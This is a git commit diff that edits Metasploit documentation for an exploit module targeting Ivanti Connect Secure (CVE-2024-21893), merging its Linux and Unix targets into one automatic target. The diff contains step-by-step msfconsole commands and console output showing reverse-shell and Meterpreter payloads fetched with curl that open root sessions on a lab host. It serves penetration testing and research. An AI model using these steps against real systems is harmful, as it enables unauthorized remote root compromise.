adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

remove the linux and unix targets in favor of a single automatic target

Browse Source
This commit is contained in:
sfewer-r7
2024-02-09 09:26:08 +00:00
parent 03a58c784b
commit 1f292c8a73
2 changed files with 59 additions and 58 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
+51 -36
View File
@@ -20,22 +20,19 @@ below steps are for HyperV, but it should be very similar to install on VMWare.
1. Start msfconsole
2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set target 0`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
6. `check`
7. `exploit`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
5. `check`
6. `exploit`
## Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
### Linux Target
### Automatic (Linux Payload)
```
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
RHOST => 192.168.86.111
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 0
target => 0
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
@@ -44,33 +41,48 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSL true no Negotiate SSL/TLS for outgoing connecti
ons
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME BiLTwvbxndD no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces.
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Acc
epted: CURL, FTP, TFTP, TNFTP
, WGET)
FETCH_DELETE false yes Attempt to delete the binary
after execution
FETCH_FILENAME XMZdmHhNxYx no Name to use on remote system
when storing payload; cannot
contain spaces.
FETCH_SRVHOST no Local IP to use for serving p
ayload
FETCH_SRVPORT 8080 yes Local port to use for serving
payload
FETCH_URIPATH no Local URI to use for serving
payload
FETCH_WRITABLE_DI /tmp yes Remote writable dir to store
R payload; cannot contain space
s.
LHOST eth0 yes The listen address (an interf
ace may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
0 Automatic
@@ -84,7 +96,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (3045380 bytes) to 192.168.86.111
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
meterpreter > getuid
Server username: root
@@ -104,17 +116,15 @@ export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
meterpreter > exit
[*] Shutting down session: 4
[*] Shutting down session: 3
[*] 192.168.86.111 - Meterpreter session 4 closed. Reason: User exit
[*] 192.168.86.111 - Meterpreter session 3 closed. Reason: Died
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
```
### Unix Target
### Automatic (Unix Payload)
```
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 1
target => 1
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
@@ -123,10 +133,14 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSL true no Negotiate SSL/TLS for outgoing connecti
ons
VHOST no HTTP server virtual host
@@ -134,7 +148,8 @@ Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST eth0 yes The listen address (an interface may be specified)
LHOST eth0 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
@@ -142,7 +157,7 @@ Exploit target:
Id Name
-- ----
1 Unix Command
0 Automatic
@@ -155,7 +170,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.111:49330) at 2024-02-06 11:39:45 +0000
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
id
uid=0(root) gid=0(root) groups=0(root)
@@ -169,6 +184,6 @@ export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
exit
[*] 192.168.86.111 - Command shell session 5 closed.
[*] 192.168.86.111 - Command shell session 4 closed.
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
```